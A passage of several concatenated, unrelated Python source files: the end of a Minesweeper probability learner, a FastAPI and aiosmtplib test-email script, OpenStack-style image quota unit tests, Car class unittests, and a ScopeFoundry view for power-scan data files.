float(self.safe)/self.tries def risk(self): return float(self.tries - self.safe)/self.tries def mine(self): self.tries += 1 return self def nomine(self): self.safe += 1 self.tries += 1 return self def __str__(self): return "Record {}/{} = {}".format(self.safe,self.tries,self.chance()) def __repr__(self): return "Record {}/{} = {}".format(self.safe,self.tries,self.chance()) def mul(iter): m = 1.0 for i in iter: m = m * i return m def train(database, window_size = 3): board = Board() ingame = True counter = 0 while ingame: fringe = [] counter+=1 # print "Itera", counter for move in board.valid_moves(): probs = [] window = board.window(move,window_size) for i,w in enumerate(window): key = i,w rec = database.get(key) if not rec: rec = Record() database[key] = rec probs.append((key,rec.chance(),rec)) prob = mul(x[1] for x in probs) # print "Move in db", move, rec.chance(), key fringe.append( (move, prob, probs) ) best = max(fringe, key=lambda x: x[1]) move = best[0] prob = best[1] probs = best[2] # print "Best move", best[0], "probability", best[1], "key", best[2] # import pdb; pdb.set_trace() ret = board.uncover(best[0]) if ret is None: # print "in game" for row in probs: row[2].nomine() # print "Move", move # print board elif ret: for row in probs: row[2].nomine() print "Won after", counter, "with move", move, prob print board ingame = False else: # print "Lost after", counter, "with move", move, prob # print board for row in probs: row[2].mine() # import pdb; pdb.set_trace() ingame = False return board def save(database): import cPickle with open("db_naive.db","w+b") as file: pickler = cPickle.Pickler(file) pickler.dump(database) def load(): import cPickle with open("db_naive.db","rb") as file: pickler = cPickle.Unpickler(file) return pickler.load() def clear(): save({}) def least_prob(db, min = 5): return sorted([ (k,v) for k,v in db.iteritems() if v.tries >= min ],key=lambda x: x[1].chance()) def most_prob(db, min = 5): return sorted([ (k,v) for k,v in db.iteritems() if v.tries >= min ], key=lambda x: x[1].risk()) def most_tried(db): return sorted([ (k,v) for k,v in db.iteritems() ],key=lambda x: x[1].tries, reverse=True) def most_mines(db): return sorted([ (k,v) for k,v in db.iteritems() ],key=lambda x: x[1].mines, reverse=True) def procedure(db = None): if not db: try: db = load() except: clear() db = load() wons = 0 losts = 0 try: while True: ret = train(db) if ret: losts += 1 else: wons += 1 except: pass print "Wons {} Losts {} Ratio {}".format(wons,losts,float(wons)/(wons+losts)) print "Saving db", save(db) print "saved" return db CodexLink/CodeStorage from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText import uvicorn import fastapi import dotenv import aiosmtplib from email.message import EmailMessage # has to be specified. import asyncio env = dotenv.load_dotenv( dotenv.find_dotenv(filename=".env", raise_error_if_not_found=True) ) import os api_instance = fastapi.FastAPI() @api_instance.on_event("startup") async def startup(): # Wrapper for send_email. ensure = asyncio.create_task(send_email()) await ensure async def send_email(): astmp_instance = aiosmtplib.SMTP(hostname="smtp.gmail.com", port=465, username=os.environ.get("from", None),password=("pwd", None), use_tls=True) print("Attempting to connect to GMail SMTP.") # https://stackoverflow.com/questions/10147455/how-to-send-an-email-with-gmail-as-provider-using-python await astmp_instance.connect() await astmp_instance.ehlo() print("Connected... Attempting to send some message.") # email_instance = EmailMessage() email_instance = MIMEMultipart("alternative") email_instance["From"] = os.environ.get("from", None) email_instance["To"] = os.environ.get("to", None) email_instance["Subject"] = "Test Email with aiostmplib with MIMEText" # email_instance.set_content("This is just a test. Test is just a test, it just redirects to my github.") # This does not render anything. html_message = MIMEText( "

Sent via aiosmtplib

This is just a test. Test is just a test, it just redirects to my github.", "html", "utf-8" ) email_instance.attach(html_message) await astmp_instance.send_message(email_instance) astmp_instance.close() # Since we have a close(), we really need to construct a class because we can't just do the basic import as it may result in circular dependency. print(f"Message has been sent. (from: {os.environ.get('from')}, to: {os.environ.get('to')}") @api_instance.on_event("shutdown") # We can use this for closing other tasks in CodexLink/folioblocks. def shutdown(): pass # for each_tasks in asyncio.all_tasks(): # each_tasks.cancel() # print("All tasks cancelled.") if __name__ == "__main__": try: uvicorn.run( app="__main__:api_instance", host="localhost", port=5001, reload=False ) except RuntimeError: print("Event loop for the aiosmtplib is not handled or will say event loop is closed. We may need proper handling from the shutdown instance than using try-except here.")0 # Copyright 2013, Red Hat, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import uuid import mock from mock import patch from oslo_utils import encodeutils from oslo_utils import units # NOTE(jokke): simplified transition to py3, behaves like py2 xrange from six.moves import range from xmonitor.common import exception from xmonitor.common import store_utils import xmonitor.quota from xmonitor.tests.unit import utils as unit_test_utils from xmonitor.tests import utils as test_utils UUID1 = 'c80a1a6c-bd1f-41c5-90ee-81afedb1d58d' class FakeContext(object): owner = 'someone' is_admin = False class FakeImage(object): size = None image_id = 'someid' locations = [{'url': 'file:///not/a/path', 'metadata': {}}] tags = set([]) def set_data(self, data, size=None): self.size = 0 for d in data: self.size += len(d) def __init__(self, **kwargs): self.extra_properties = kwargs.get('extra_properties', {}) class TestImageQuota(test_utils.BaseTestCase): def setUp(self): super(TestImageQuota, self).setUp() def tearDown(self): super(TestImageQuota, self).tearDown() def _get_image(self, location_count=1, image_size=10): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'xyz' base_image.size = image_size image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) locations = [] for i in range(location_count): locations.append({'url': 'file:///g/there/it/is%d' % i, 'metadata': {}, 'status': 'active'}) image_values = {'id': 'xyz', 'owner': context.owner, 'status': 'active', 'size': image_size, 'locations': locations} db_api.image_create(context, image_values) return image def test_quota_allowed(self): quota = 10 self.config(user_storage_quota=str(quota)) context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'id' image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) data = '*' * quota base_image.set_data(data, size=None) image.set_data(data) self.assertEqual(quota, base_image.size) def _test_quota_allowed_unit(self, data_length, config_quota): self.config(user_storage_quota=config_quota) context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'id' image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) data = '*' * data_length base_image.set_data(data, size=None) image.set_data(data) self.assertEqual(data_length, base_image.size) def test_quota_allowed_unit_b(self): self._test_quota_allowed_unit(10, '10B') def test_quota_allowed_unit_kb(self): self._test_quota_allowed_unit(10, '1KB') def test_quota_allowed_unit_mb(self): self._test_quota_allowed_unit(10, '1MB') def test_quota_allowed_unit_gb(self): self._test_quota_allowed_unit(10, '1GB') def test_quota_allowed_unit_tb(self): self._test_quota_allowed_unit(10, '1TB') def _quota_exceeded_size(self, quota, data, deleted=True, size=None): self.config(user_storage_quota=quota) context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = 'id' image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) if deleted: with patch.object(store_utils, 'safe_delete_from_backend'): store_utils.safe_delete_from_backend( context, image.image_id, base_image.locations[0]) self.assertRaises(exception.StorageQuotaFull, image.set_data, data, size=size) def test_quota_exceeded_no_size(self): quota = 10 data = '*' * (quota + 1) # NOTE(jbresnah) When the image size is None it means that it is # not known. In this case the only time we will raise an # exception is when there is no room left at all, thus we know # it will not fit. # That's why 'get_remaining_quota' is mocked with return_value = 0. with patch.object(xmonitor.api.common, 'get_remaining_quota', return_value=0): self._quota_exceeded_size(str(quota), data) def test_quota_exceeded_with_right_size(self): quota = 10 data = '*' * (quota + 1) self._quota_exceeded_size(str(quota), data, size=len(data), deleted=False) def test_quota_exceeded_with_right_size_b(self): quota = 10 data = '*' * (quota + 1) self._quota_exceeded_size('10B', data, size=len(data), deleted=False) def test_quota_exceeded_with_right_size_kb(self): quota = units.Ki data = '*' * (quota + 1) self._quota_exceeded_size('1KB', data, size=len(data), deleted=False) def test_quota_exceeded_with_lie_size(self): quota = 10 data = '*' * (quota + 1) self._quota_exceeded_size(str(quota), data, deleted=False, size=quota - 1) def test_append_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations.append(new_location) pre_add_locations.append(new_location) self.assertEqual(image.locations, pre_add_locations) def test_insert_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations.insert(0, new_location) pre_add_locations.insert(0, new_location) self.assertEqual(image.locations, pre_add_locations) def test_extend_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations.extend([new_location]) pre_add_locations.extend([new_location]) self.assertEqual(image.locations, pre_add_locations) def test_iadd_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() pre_add_locations = image.locations[:] image.locations += [new_location] pre_add_locations += [new_location] self.assertEqual(image.locations, pre_add_locations) def test_set_location(self): new_location = {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'} image = self._get_image() image.locations = [new_location] self.assertEqual(image.locations, [new_location]) def _make_image_with_quota(self, image_size=10, location_count=2): quota = image_size * location_count self.config(user_storage_quota=str(quota)) return self._get_image(image_size=image_size, location_count=location_count) def test_exceed_append_location(self): image = self._make_image_with_quota() self.assertRaises(exception.StorageQuotaFull, image.locations.append, {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}) def test_exceed_insert_location(self): image = self._make_image_with_quota() self.assertRaises(exception.StorageQuotaFull, image.locations.insert, 0, {'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}) def test_exceed_extend_location(self): image = self._make_image_with_quota() self.assertRaises(exception.StorageQuotaFull, image.locations.extend, [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}]) def test_set_location_under(self): image = self._make_image_with_quota(location_count=1) image.locations = [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}] def test_set_location_exceed(self): image = self._make_image_with_quota(location_count=1) try: image.locations = [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}, {'url': 'file:///a/path2', 'metadata': {}, 'status': 'active'}] self.fail('Should have raised the quota exception') except exception.StorageQuotaFull: pass def test_iadd_location_exceed(self): image = self._make_image_with_quota(location_count=1) try: image.locations += [{'url': 'file:///a/path', 'metadata': {}, 'status': 'active'}] self.fail('Should have raised the quota exception') except exception.StorageQuotaFull: pass def test_append_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations.append({'url': 'file:///fake.img.tar.gz', 'metadata': {}}) self.assertIn({'url': 'file:///fake.img.tar.gz', 'metadata': {}}, image.locations) def test_insert_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations.insert(0, {'url': 'file:///fake.img.tar.gz', 'metadata': {}}) self.assertIn({'url': 'file:///fake.img.tar.gz', 'metadata': {}}, image.locations) def test_set_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations = [{'url': 'file:///fake.img.tar.gz', 'metadata': {}}] self.assertEqual([{'url': 'file:///fake.img.tar.gz', 'metadata': {}}], image.locations) def test_iadd_location_for_queued_image(self): context = FakeContext() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) base_image = FakeImage() base_image.image_id = str(uuid.uuid4()) image = xmonitor.quota.ImageProxy(base_image, context, db_api, store) self.assertIsNone(image.size) self.stubs.Set(store_api, 'get_size_from_backend', unit_test_utils.fake_get_size_from_backend) image.locations += [{'url': 'file:///fake.img.tar.gz', 'metadata': {}}] self.assertIn({'url': 'file:///fake.img.tar.gz', 'metadata': {}}, image.locations) class TestImagePropertyQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImagePropertyQuotas, self).setUp() self.base_image = FakeImage() self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.image_repo_mock = mock.Mock() self.image_repo_mock.add.return_value = self.base_image self.image_repo_mock.save.return_value = self.base_image self.image_repo_proxy = xmonitor.quota.ImageRepoProxy( self.image_repo_mock, mock.Mock(), mock.Mock(), mock.Mock()) def test_save_image_with_image_property(self): self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) def test_save_image_too_many_image_properties(self): self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar', 'foo2': 'bar2'} exc = self.assertRaises(exception.ImagePropertyLimitExceeded, self.image_repo_proxy.save, self.image) self.assertIn("Attempted: 2, Maximum: 1", encodeutils.exception_to_unicode(exc)) def test_save_image_unlimited_image_properties(self): self.config(image_property_quota=-1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) def test_add_image_with_image_property(self): self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.add(self.image) self.image_repo_mock.add.assert_called_once_with(self.base_image) def test_add_image_too_many_image_properties(self): self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'bar', 'foo2': 'bar2'} exc = self.assertRaises(exception.ImagePropertyLimitExceeded, self.image_repo_proxy.add, self.image) self.assertIn("Attempted: 2, Maximum: 1", encodeutils.exception_to_unicode(exc)) def test_add_image_unlimited_image_properties(self): self.config(image_property_quota=-1) self.image.extra_properties = {'foo': 'bar'} self.image_repo_proxy.add(self.image) self.image_repo_mock.add.assert_called_once_with(self.base_image) def _quota_exceed_setup(self): self.config(image_property_quota=2) self.base_image.extra_properties = {'foo': 'bar', 'spam': 'ham'} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) def test_modify_image_properties_when_quota_exceeded(self): self._quota_exceed_setup() self.config(image_property_quota=1) self.image.extra_properties = {'foo': 'frob', 'spam': 'eggs'} self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) self.assertEqual('frob', self.base_image.extra_properties['foo']) self.assertEqual('eggs', self.base_image.extra_properties['spam']) def test_delete_image_properties_when_quota_exceeded(self): self._quota_exceed_setup() self.config(image_property_quota=1) del self.image.extra_properties['foo'] self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) self.assertNotIn('foo', self.base_image.extra_properties) self.assertEqual('ham', self.base_image.extra_properties['spam']) def test_invalid_quota_config_parameter(self): self.config(user_storage_quota='foo') location = {"url": "file:///fake.img.tar.gz", "metadata": {}} self.assertRaises(exception.InvalidOptionValue, self.image.locations.append, location) def test_exceed_quota_during_patch_operation(self): self._quota_exceed_setup() self.image.extra_properties['frob'] = 'baz' self.image.extra_properties['lorem'] = 'ipsum' self.assertEqual('bar', self.base_image.extra_properties['foo']) self.assertEqual('ham', self.base_image.extra_properties['spam']) self.assertEqual('baz', self.base_image.extra_properties['frob']) self.assertEqual('ipsum', self.base_image.extra_properties['lorem']) del self.image.extra_properties['frob'] del self.image.extra_properties['lorem'] self.image_repo_proxy.save(self.image) call_args = mock.call(self.base_image, from_state=None) self.assertEqual(call_args, self.image_repo_mock.save.call_args) self.assertEqual('bar', self.base_image.extra_properties['foo']) self.assertEqual('ham', self.base_image.extra_properties['spam']) self.assertNotIn('frob', self.base_image.extra_properties) self.assertNotIn('lorem', self.base_image.extra_properties) def test_quota_exceeded_after_delete_image_properties(self): self.config(image_property_quota=3) self.base_image.extra_properties = {'foo': 'bar', 'spam': 'ham', 'frob': 'baz'} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.config(image_property_quota=1) del self.image.extra_properties['foo'] self.image_repo_proxy.save(self.image) self.image_repo_mock.save.assert_called_once_with(self.base_image, from_state=None) self.assertNotIn('foo', self.base_image.extra_properties) self.assertEqual('ham', self.base_image.extra_properties['spam']) self.assertEqual('baz', self.base_image.extra_properties['frob']) class TestImageTagQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImageTagQuotas, self).setUp() self.base_image = mock.Mock() self.base_image.tags = set([]) self.base_image.extra_properties = {} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.image_repo_mock = mock.Mock() self.image_repo_proxy = xmonitor.quota.ImageRepoProxy( self.image_repo_mock, mock.Mock(), mock.Mock(), mock.Mock()) def test_replace_image_tag(self): self.config(image_tag_quota=1) self.image.tags = ['foo'] self.assertEqual(1, len(self.image.tags)) def test_replace_too_many_image_tags(self): self.config(image_tag_quota=0) exc = self.assertRaises(exception.ImageTagLimitExceeded, setattr, self.image, 'tags', ['foo', 'bar']) self.assertIn('Attempted: 2, Maximum: 0', encodeutils.exception_to_unicode(exc)) self.assertEqual(0, len(self.image.tags)) def test_replace_unlimited_image_tags(self): self.config(image_tag_quota=-1) self.image.tags = ['foo'] self.assertEqual(1, len(self.image.tags)) def test_add_image_tag(self): self.config(image_tag_quota=1) self.image.tags.add('foo') self.assertEqual(1, len(self.image.tags)) def test_add_too_many_image_tags(self): self.config(image_tag_quota=1) self.image.tags.add('foo') exc = self.assertRaises(exception.ImageTagLimitExceeded, self.image.tags.add, 'bar') self.assertIn('Attempted: 2, Maximum: 1', encodeutils.exception_to_unicode(exc)) def test_add_unlimited_image_tags(self): self.config(image_tag_quota=-1) self.image.tags.add('foo') self.assertEqual(1, len(self.image.tags)) def test_remove_image_tag_while_over_quota(self): self.config(image_tag_quota=1) self.image.tags.add('foo') self.assertEqual(1, len(self.image.tags)) self.config(image_tag_quota=0) self.image.tags.remove('foo') self.assertEqual(0, len(self.image.tags)) class TestQuotaImageTagsProxy(test_utils.BaseTestCase): def setUp(self): super(TestQuotaImageTagsProxy, self).setUp() def test_add(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set([])) proxy.add('foo') self.assertIn('foo', proxy) def test_add_too_many_tags(self): self.config(image_tag_quota=0) proxy = xmonitor.quota.QuotaImageTagsProxy(set([])) exc = self.assertRaises(exception.ImageTagLimitExceeded, proxy.add, 'bar') self.assertIn('Attempted: 1, Maximum: 0', encodeutils.exception_to_unicode(exc)) def test_equals(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set([])) self.assertEqual(set([]), proxy) def test_contains(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set(['foo'])) self.assertIn('foo', proxy) def test_len(self): proxy = xmonitor.quota.QuotaImageTagsProxy(set(['foo', 'bar', 'baz', 'niz'])) self.assertEqual(4, len(proxy)) def test_iter(self): items = set(['foo', 'bar', 'baz', 'niz']) proxy = xmonitor.quota.QuotaImageTagsProxy(items.copy()) self.assertEqual(4, len(items)) for item in proxy: items.remove(item) self.assertEqual(0, len(items)) class TestImageMemberQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImageMemberQuotas, self).setUp() db_api = unit_test_utils.FakeDB() store_api = unit_test_utils.FakeStoreAPI() store = unit_test_utils.FakeStoreUtils(store_api) context = FakeContext() self.image = mock.Mock() self.base_image_member_factory = mock.Mock() self.image_member_factory = xmonitor.quota.ImageMemberFactoryProxy( self.base_image_member_factory, context, db_api, store) def test_new_image_member(self): self.config(image_member_quota=1) self.image_member_factory.new_image_member(self.image, 'fake_id') nim = self.base_image_member_factory.new_image_member nim.assert_called_once_with(self.image, 'fake_id') def test_new_image_member_unlimited_members(self): self.config(image_member_quota=-1) self.image_member_factory.new_image_member(self.image, 'fake_id') nim = self.base_image_member_factory.new_image_member nim.assert_called_once_with(self.image, 'fake_id') def test_new_image_member_too_many_members(self): self.config(image_member_quota=0) self.assertRaises(exception.ImageMemberLimitExceeded, self.image_member_factory.new_image_member, self.image, 'fake_id') class TestImageLocationQuotas(test_utils.BaseTestCase): def setUp(self): super(TestImageLocationQuotas, self).setUp() self.base_image = mock.Mock() self.base_image.locations = [] self.base_image.size = 1 self.base_image.extra_properties = {} self.image = xmonitor.quota.ImageProxy(self.base_image, mock.Mock(), mock.Mock(), mock.Mock()) self.image_repo_mock = mock.Mock() self.image_repo_proxy = xmonitor.quota.ImageRepoProxy( self.image_repo_mock, mock.Mock(), mock.Mock(), mock.Mock()) def test_replace_image_location(self): self.config(image_location_quota=1) self.image.locations = [{"url": "file:///fake.img.tar.gz", "metadata": {} }] self.assertEqual(1, len(self.image.locations)) def test_replace_too_many_image_locations(self): self.config(image_location_quota=1) self.image.locations = [{"url": "file:///fake.img.tar.gz", "metadata": {}} ] locations = [ {"url": "file:///fake1.img.tar.gz", "metadata": {}}, {"url": "file:///fake2.img.tar.gz", "metadata": {}}, {"url": "file:///fake3.img.tar.gz", "metadata": {}} ] exc = self.assertRaises(exception.ImageLocationLimitExceeded, setattr, self.image, 'locations', locations) self.assertIn('Attempted: 3, Maximum: 1', encodeutils.exception_to_unicode(exc)) self.assertEqual(1, len(self.image.locations)) def test_replace_unlimited_image_locations(self): self.config(image_location_quota=-1) self.image.locations = [{"url": "file:///fake.img.tar.gz", "metadata": {}} ] self.assertEqual(1, len(self.image.locations)) def test_add_image_location(self): self.config(image_location_quota=1) location = {"url": "file:///fake.img.tar.gz", "metadata": {}} self.image.locations.append(location) self.assertEqual(1, len(self.image.locations)) def test_add_too_many_image_locations(self): self.config(image_location_quota=1) location1 = {"url": "file:///fake1.img.tar.gz", "metadata": {}} self.image.locations.append(location1) location2 = {"url": "file:///fake2.img.tar.gz", "metadata": {}} exc = self.assertRaises(exception.ImageLocationLimitExceeded, self.image.locations.append, location2) self.assertIn('Attempted: 2, Maximum: 1', encodeutils.exception_to_unicode(exc)) def test_add_unlimited_image_locations(self): self.config(image_location_quota=-1) location1 = {"url": "file:///fake1.img.tar.gz", "metadata": {}} self.image.locations.append(location1) self.assertEqual(1, len(self.image.locations)) def test_remove_image_location_while_over_quota(self): self.config(image_location_quota=1) location1 = {"url": "file:///fake1.img.tar.gz", "metadata": {}} self.image.locations.append(location1) self.assertEqual(1, len(self.image.locations)) self.config(image_location_quota=0) self.image.locations.remove(location1) self.assertEqual(0, len(self.image.locations)) import unittest from LAB_TESTING.CarManager.car_manager import Car class TestCar(unittest.TestCase): def setUp(self): self.car = Car('Car', 'Shkoda', 1, 30) def test_set_up(self): self.assertEqual(self.car.make, 'Car') self.assertEqual(self.car.model, 'Shkoda') self.assertEqual(self.car.fuel_consumption, 1) self.assertEqual(self.car.fuel_capacity, 30) self.assertEqual(self.car.fuel_amount, 0) def test_make_return_result(self): self.assertEqual(self.car.make, 'Car') def test_make_setter_raise_exception_if_not_value(self): with self.assertRaises(Exception) as ex: self.car.make = '' self.assertEqual(str(ex.exception), "Make cannot be null or empty!") def test_make_setter_change_value(self): self.car.make = 'car' self.assertEqual(self.car.make, 'car') def test_model_should_raise_exception_when_is_empty(self): with self.assertRaises(Exception) as ex: self.car.model = '' self.assertEqual(str(ex.exception), "Model cannot be null or empty!") def test_model_change_when_value_is_not_empty(self): self.car.model = 'Opel' self.assertEqual(self.car.model, 'Opel') def test_fuel_consumption_return(self): self.assertEqual(self.car.fuel_consumption, 1) def test_fuel_consumption_raise_exception_if_value_is_less_or_equal_to_zero(self): with self.assertRaises(Exception) as ex: self.car.fuel_consumption = 0 self.assertEqual(str(ex.exception), "Fuel consumption cannot be zero or negative!") with self.assertRaises(Exception) as ex: self.car.fuel_consumption = -10 self.assertEqual(str(ex.exception), "Fuel consumption cannot be zero or negative!") def test_fuel_capacist(self): self.assertEqual(self.car.fuel_capacity, 30) def test_fuel_capacity_raise_ex_when_less_or_equal_to_zeor(self): with self.assertRaises(Exception) as ex: self.car.fuel_capacity = 0 self.assertEqual(str(ex.exception), "Fuel capacity cannot be zero or negative!") with self.assertRaises(Exception) as ex: self.car.fuel_capacity = -10 self.assertEqual(str(ex.exception), "Fuel capacity cannot be zero or negative!") def test_fuel_amount(self): self.assertEqual(self.car.fuel_amount, 0) def test_fuel_ammount_should_raise_exceptipon_when_is_less_then_zero(self): with self.assertRaises(Exception) as ex: self.car.fuel_amount = -10 self.assertEqual(str(ex.exception), "Fuel amount cannot be negative!") def test_fuel_ammount_change_when_not_less_then_zero(self): self.car.fuel_amount = 10 self.assertEqual(self.car.fuel_amount, 10) def test_refuel_raise_exception_when_try_to_refuel_with_negative_or_zero_value(self): with self.assertRaises(Exception) as ex: self.car.refuel(0) self.assertEqual(str(ex.exception), "Fuel amount cannot be zero or negative!") with self.assertRaises(Exception) as ex: self.car.refuel(-10) self.assertEqual(str(ex.exception), "Fuel amount cannot be zero or negative!") def test_refuel_change_value(self): self.car.refuel(10) self.assertEqual(self.car.fuel_amount, 10) def test_refuel_when_more_then_fuel_capacity_return_capacity_value(self): self.car.refuel(40) self.assertEqual(self.car.fuel_amount, 30) def test_drive_raise_exception_when_fuel_is_not_enought(self): with self.assertRaises(Exception) as ex: self.car.drive(100) self.assertEqual(str(ex.exception), "You don't have enough fuel to drive!") def test_drive_decrease_value_when_distance_is_ok_to_car(self): self.car.fuel_amount = 1 self.car.drive(10) self.assertEqual(self.car.fuel_amount, 0.9) if __name__ == '__main__': unittest.main()ScopeFoundry/FoundryDataBrowser from ScopeFoundry.data_browser import DataBrowserView import pyqtgraph as pg from qtpy import QtWidgets import numpy as np class PowerScanNPZView(DataBrowserView): name = 'power_scan_npz' def is_file_supported(self, fname): return('power_scan' in fname) and ('.npz' in fname) def setup(self): self.settings.New('spec_index', dtype=int, initial=0) self.ui = QtWidgets.QGroupBox() self.ui.setLayout(QtWidgets.QVBoxLayout()) self.ui.spec_index_doubleSpinBox = QtWidgets.QDoubleSpinBox() self.settings.spec_index.connect_bidir_to_widget(self.ui.spec_index_doubleSpinBox) self.ui.layout().addWidget(self.ui.spec_index_doubleSpinBox) self.graph_layout = pg.GraphicsLayoutWidget() self.ui.layout().addWidget(self.graph_layout) self.power_plot = self.graph_layout.addPlot() self.power_plot.setLogMode(x=True, y=True) self.power_plotcurve = self.power_plot.plot([1],[1], name='Data') self.power_fit_plotcurve = self.power_plot.plot([1],[1],pen='r', name='Fit') self.power_plot_arrow = pg.ArrowItem() self.power_plot_arrow.setPos(0,0) self.power_plot.addItem(self.power_plot_arrow) self.power_plot_lr = pg.LinearRegionItem([1,2]) self.power_plot_lr.setZValue(-10) self.power_plot.addItem(self.power_plot_lr) self.power_plot_lr.sigRegionChanged.connect(self.redo_fit) #self.power_plot_legend = pg.LegendItem() #self.power_plot.addItem(self.power_plot_legend) #self.power_plot_legend.addItem(self.power_plotcurve) #self.power_plot_legend.addItem(self.power_fit_plotcurve) self.fit_text = pg.TextItem("fit") self.fit_text.setParentItem(self.power_plot_lr, ) self.graph_layout.nextRow() self.spec_plot = self.graph_layout.addPlot() self.spec_plotcurve = self.spec_plot.plot([0]) self.settings.spec_index.add_listener(self.on_spec_index_change) def on_change_data_filename(self, fname=None): if fname == "0": return try: dat = self.dat = np.load(fname) self.settings.spec_index.change_min_max(0, len(dat['power_meter_power'])-1) if 'time_traces' in self.dat: self.data_avail = True self.power_plot_y = np.sum(dat['time_traces'], axis=1) self.power_plot.setLabel('left', 'Total Intensity', units='counts') self.power_plot.setLabel('bottom', 'Power', units='W') cr0 = self.dat['picoharp_count_rate0'] rep_period_s = 1.0/cr0 time_bin_resolution = self.dat['picoharp_Resolution']*1e-12 self.num_hist_chans = int(np.ceil(rep_period_s/time_bin_resolution)) self.spec_plot.setLogMode(False, True) self.spec_plot.setLabel('left', 'Intensity', units='counts') self.spec_plot.setLabel('bottom', 'time', units='ns') elif 'integrated_spectra' in self.dat: self.data_avail = True self.power_plot_y = np.array(dat['integrated_spectra']) else: self.data_avail = False self.power_plotcurve.setData(dat['power_meter_power']) if self.data_avail: # to fix issues with log-log plotting, we shift negative data if np.any(self.power_plot_y < 0): self.power_plot_y -= np.min(self.power_plot_y) - 1 x = dat['power_meter_power'] self.power_plotcurve.setData(x, self.power_plot_y) try: self.redo_fit() except Exception as err: print("failed to fit", err) self.settings['spec_index'] = 0 self.on_spec_index_change() except Exception as err: self.databrowser.ui.statusbar.showMessage("failed to load %s:\n%s" %(fname, err)) raise(err) def on_spec_index_change(self): ii = self.settings['spec_index'] H = self.dat if 'time_traces' in self.dat: self.spec_plotcurve.setData(H['time_array'][:self.num_hist_chans], 1+H['time_traces'][ii,:self.num_hist_chans]) if 'integrated_spectra' in H: print(H['power_meter_power'][ii], H['integrated_spectra'][ii]) if 'spectra' in H: self.spec_plotcurve.setData(H['wls'], H['spectra'][ii]) if self.data_avail: 